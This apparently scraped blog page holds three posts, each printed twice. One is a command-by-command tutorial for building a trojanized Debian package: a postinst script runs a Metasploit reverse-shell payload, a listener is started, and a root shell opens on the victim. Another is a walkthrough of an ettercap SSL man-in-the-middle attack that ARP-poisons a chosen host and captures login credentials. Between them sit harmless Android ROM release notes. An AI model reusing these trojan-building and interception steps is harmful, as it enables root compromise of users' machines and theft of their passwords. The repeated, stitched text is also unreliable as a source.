Not wanting to leave out the Linux side of things, here's a quick run-down of building a Trojan .deb file for targeting ubuntu 9.10 or debian based systems.
Again, this is an attack that exploits users more than it does any specific system vulnerability, and unfortunately many Linux users.. particularly Ubuntu users (because a large percentage of them are new to computers / Linux / security).. will tend to be very trusting of others that offer them software or provide links to resources, and an unscrupulous attacker can take advantage of that.
All an attacker needs is a .deb, we'll use blast.. its a weird little game where you can turn your display into swiss cheese.
Then make a directory to work in and move the blast package there:
Next, make a control file that details your new package, this can be as fake or realistic as you like but you must make sure the architecture is set to what your victim will be using (x86 vs amd64), and a post-install script that will run the Trojan binary:
Package: Blast
Version: 0.666
Section: Games And Amusement
Priority: Optional
Architecture: i386
Maintainer: Deceased
Description: Tojan Test
root@zombi:/x/pkg/DEBIAN# chmod 755 postinst
Next, set up the payload, this is done just like the windows Trojan only using a Linux shell and a normal binary rather than a .exe, after-which we build the new Trojan .deb package:
And back to our trusty listener on the attackers machine, again, just like before when exploiting windows:
root@zombi:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.168.13 LPORT=9999 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.168.13:9999
[*] Starting the payload handler...
Now, the attacker is all set with their Trojan .deb package and only needs to trick a user into running it, the beauty in this particular vector is that in Debian based Linux systems a user must install packages as root or using sudo (ironically a security feature), which means that our Trojan will be executed as root.
---Through social engineering or some other method, the user is convinced to run our infected .deb ---
And the attacker is greeted with a nice little message:
[*] Sending stage (36 bytes)
[*] Sending stage (36 bytes)
[*] Command shell session 2 opened (192.168.168.13:9999 -> 192.168.168.144:52402)
hostname
bt
whoami
root
Todays lesson: stick to software in a trusted repository unless you really trust your source.
Again, this is an attack that exploits users more than it does any specific system vulnerability, and unfortunately many Linux users.. particularly Ubuntu users (because a large percentage of them are new to computers / Linux / security).. will tend to be very trusting of others that offer them software or provide links to resources, and an unscrupulous attacker can take advantage of that.
All an attacker needs is a .deb, we'll use blast.. its a weird little game where you can turn your display into swiss cheese.
root@zombi:/#apt-get install blast
Then make a directory to work in and move the blast package there:
root@zombi:/#mkdir /x
root@zombi:/x# cp /var/cache/apt/archives/blast_1.1-19_amd64.deb .
root@zombi:/x# dpkg -x blast_1.1-19_amd64.deb pkg
root@zombi:/x# mkdir pkg/DEBIAN
Next, make a control file that details your new package, this can be as fake or realistic as you like but you must make sure the architecture is set to what your victim will be using (x86 vs amd64), and a post-install script that will run the Trojan binary:
root@zombi:/x# cd pkg/DEBIAN/
root@zombi:/x/pkg/DEBIAN# vim control
Package: Blast
Version: 0.666
Section: Games And Amusement
Priority: Optional
Architecture: i386
Maintainer: Deceased
Description: Tojan Test
root@zombi:/x/pkg/DEBIAN# vim postinst
#!/bin/sh
sudo chmod 2755 /usr/games/blast && /usr/games/blast & /usr/games/blast &root@zombi:/x/pkg/DEBIAN# chmod 755 postinst
Next, set up the payload, this is done just like the windows Trojan only using a Linux shell and a normal binary rather than a .exe, after-which we build the new Trojan .deb package:
root@zombi:/x/pkg/DEBIAN# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.168.13 LPORT=9999 X > /x/pkg/usr/games/blast
root@zombi:/x/pkg/DEBIAN# dpkg-deb --build /x/pkg
root@zombi:/x# mv pkg.deb blast_0.666.deb
And back to our trusty listener on the attackers machine, again, just like before when exploiting windows:
root@zombi:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.168.13 LPORT=9999 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.168.13:9999
[*] Starting the payload handler...
Now, the attacker is all set with their Trojan .deb package and only needs to trick a user into running it, the beauty in this particular vector is that in Debian based Linux systems a user must install packages as root or using sudo (ironically a security feature), which means that our Trojan will be executed as root.
---Through social engineering or some other method, the user is convinced to run our infected .deb ---
neurophobic@bt:~$ sudo dpkg -i blast_0.666.deb
tar: ./control: time stamp 2010-03-02 11:19:22 is 34.574471421 s in the future
tar: .: time stamp 2010-03-02 11:19:22 is 34.573961287 s in the future
Selecting previously deselected package blast.
(Reading database ... 269350 files and directories currently installed.)
Unpacking blast (from blast_0.666.deb) ...
Setting up blast (0.666) ...
Processing triggers for menu ...
Processing triggers for man-db ...
tar: ./control: time stamp 2010-03-02 11:19:22 is 34.574471421 s in the future
tar: .: time stamp 2010-03-02 11:19:22 is 34.573961287 s in the future
Selecting previously deselected package blast.
(Reading database ... 269350 files and directories currently installed.)
Unpacking blast (from blast_0.666.deb) ...
Setting up blast (0.666) ...
Processing triggers for menu ...
Processing triggers for man-db ...
And the attacker is greeted with a nice little message:
[*] Sending stage (36 bytes)
[*] Sending stage (36 bytes)
[*] Command shell session 2 opened (192.168.168.13:9999 -> 192.168.168.144:52402)
hostname
bt
whoami
root
Todays lesson: stick to software in a trusted repository unless you really trust your source.
Monday, March 1, 2010
Smoked Glass Rom 5.0.1 ... and CM?
I missed this update, its downloading now. Adamz finally has the smoked glass rom in a format that works with the standard flashing system... and its now version 5, dude works fast. This is a huge update and i'm looking forward to messing with it.
http://alldroid.org/viewtopic.php?f=311&t=2853
February 27, 2010 (5.0 & 5.0.1)
5.0.1
- Just a really quick update. I added the Beta 3 version of 2.1 Launcher (Greek35T). Even less issues!
5.0
*** Largest update is the ROM format... you get complete customization. Make the ROM your own!
- Options to Wipe Data and Wipe Data & keep Apps
- Options to Wipe Cache
- Option to copy HTC IME Keyboard to SD Card (thanks to jonasl at XDA)
- New version of 2.1 Launcher - Fixes Landscape and less FCing (thanks to Greek35T)
- Fixed issue of speed and FCing of 2.0.1 Launcher... sorry about that.
- Live Wallpapers (Interactive with Launcher2) (thanks to xeudoxus)
- 2.0 Lockscreen Vibrate Hack (Lockscreen will take you to vibrate... Long-press of power will silence)
- Two options for boot.img... 250-1100 MHz and 250-800 MHz.
- Option to choose which ROM from installation - Full Theme, Full with Blue Clock/Notifications, and Glass Only Theme
- Brought back the option to include Milestone MediaGallery and PhotoEditor
- Option to install Wifi Tether from the ROM Installation... no extra download necessary. (same version as before)
- Option to install the Audio Toggle App
- Option to install the Low Brightness App
- Option to install Droid Font
...
Also, check this out.. renowned rom maker Cyanogen has a 2.1 rom working on the Droid.
http://alldroid.org/viewtopic.php?f=328&t=2260
Anyone have info on it? im sure I will try it out before long
http://alldroid.org/viewtopic.php?f=311&t=2853
February 27, 2010 (5.0 & 5.0.1)
5.0.1
- Just a really quick update. I added the Beta 3 version of 2.1 Launcher (Greek35T). Even less issues!
5.0
*** Largest update is the ROM format... you get complete customization. Make the ROM your own!
- Options to Wipe Data and Wipe Data & keep Apps
- Options to Wipe Cache
- Option to copy HTC IME Keyboard to SD Card (thanks to jonasl at XDA)
- New version of 2.1 Launcher - Fixes Landscape and less FCing (thanks to Greek35T)
- Fixed issue of speed and FCing of 2.0.1 Launcher... sorry about that.
- Live Wallpapers (Interactive with Launcher2) (thanks to xeudoxus)
- 2.0 Lockscreen Vibrate Hack (Lockscreen will take you to vibrate... Long-press of power will silence)
- Two options for boot.img... 250-1100 MHz and 250-800 MHz.
- Option to choose which ROM from installation - Full Theme, Full with Blue Clock/Notifications, and Glass Only Theme
- Brought back the option to include Milestone MediaGallery and PhotoEditor
- Option to install Wifi Tether from the ROM Installation... no extra download necessary. (same version as before)
- Option to install the Audio Toggle App
- Option to install the Low Brightness App
- Option to install Droid Font
...
Also, check this out.. renowned rom maker Cyanogen has a 2.1 rom working on the Droid.
http://alldroid.org/viewtopic.php?f=328&t=2260
Anyone have info on it? im sure I will try it out before long
SSL Man In The Middle with Ettercap
Playing a bit more with ettercap, this time around we'll look at enabling SSL Man in the Middle attacks so that we can retrieve data from encrypted connections as well as clear-text ones.
The attacker's machine is running ubuntu 9.10, and the victims tested were both ubuntu and windows 7.
Edit /etc/etter.conf and set both the user and group id to 0, this is dangerous if someone has a method for counter attacking against ettercap, but it lets ettercap set iptables rules in order to forward ports for breaking SSL connections and substituting certificates. Those iptables rules are allready in etter.conf, and just need to be uncommented:
You may also need to enable network forwarding:
To get away from the noisy method used previously it's best to just pick on one host at a time, a quiet nmap of the network should give you an idea of which ip addresses on the network will make a good target, windows desktops are the best option obviously.
All you need to do is fire up ettercap like before but use an extra remote tag and plug in your victim ip address, I chose .24, a windows 7 machine.
#ettercap -Tqi wlan0 -M arp:remote /192.168.168.168/ /192.168.168.24/
This is where the attacker now depends on user ignorance and/or impatience, as when the victim tries to visit a site that uses SSL to encrypt the connection they will receive a giant warning screen telling them that somthing is wrong... which most users promptly ignore...
By accepting the invalid certificate which ettercap has provided them, the attackers machine now sees in cleartext all of the data that should have been encrypted. Furthermore, when ettercap sniffs a login packet, it immediately displays the contents of it to the attacker in a nice easy to read format such as this:
HTTP : 65.54.165.179:443 -> USER: [removed]@hotmail.com PASS: [removed] INFO: login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1267474281&rver=6.0.5285.0&wp=MBI&wreply=http://mail.live.com/default.aspx&lc=1033&id=6485
Of-course I removed the user-name and password since I don't want to show the world, but you can try this with your own account and see them clear as day.
This attack can be particularly devastating if crafted to target services that use expired, self signed, or otherwise problematic certificates which have made all of their users used to simply ignoring the warning given to them by their browser, the one chance users have to stop and think twice is destroyed.
The attacker's machine is running ubuntu 9.10, and the victims tested were both ubuntu and windows 7.
Edit /etc/etter.conf and set both the user and group id to 0, this is dangerous if someone has a method for counter attacking against ettercap, but it lets ettercap set iptables rules in order to forward ports for breaking SSL connections and substituting certificates. Those iptables rules are allready in etter.conf, and just need to be uncommented:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
You may also need to enable network forwarding:
#echo 1 > /proc/sys/net/ipv4/ip_forward
To get away from the noisy method used previously it's best to just pick on one host at a time, a quiet nmap of the network should give you an idea of which ip addresses on the network will make a good target, windows desktops are the best option obviously.
All you need to do is fire up ettercap like before but use an extra remote tag and plug in your victim ip address, I chose .24, a windows 7 machine.
#ettercap -Tqi wlan0 -M arp:remote /192.168.168.168/ /192.168.168.24/
This is where the attacker now depends on user ignorance and/or impatience, as when the victim tries to visit a site that uses SSL to encrypt the connection they will receive a giant warning screen telling them that somthing is wrong... which most users promptly ignore...
By accepting the invalid certificate which ettercap has provided them, the attackers machine now sees in cleartext all of the data that should have been encrypted. Furthermore, when ettercap sniffs a login packet, it immediately displays the contents of it to the attacker in a nice easy to read format such as this:
HTTP : 65.54.165.179:443 -> USER: [removed]@hotmail.com PASS: [removed] INFO: login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1267474281&rver=6.0.5285.0&wp=MBI&wreply=http://mail.live.com/default.aspx&lc=1033&id=6485
Of-course I removed the user-name and password since I don't want to show the world, but you can try this with your own account and see them clear as day.
This attack can be particularly devastating if crafted to target services that use expired, self signed, or otherwise problematic certificates which have made all of their users used to simply ignoring the warning given to them by their browser, the one chance users have to stop and think twice is destroyed.
Subscribe to:
Posts (Atom)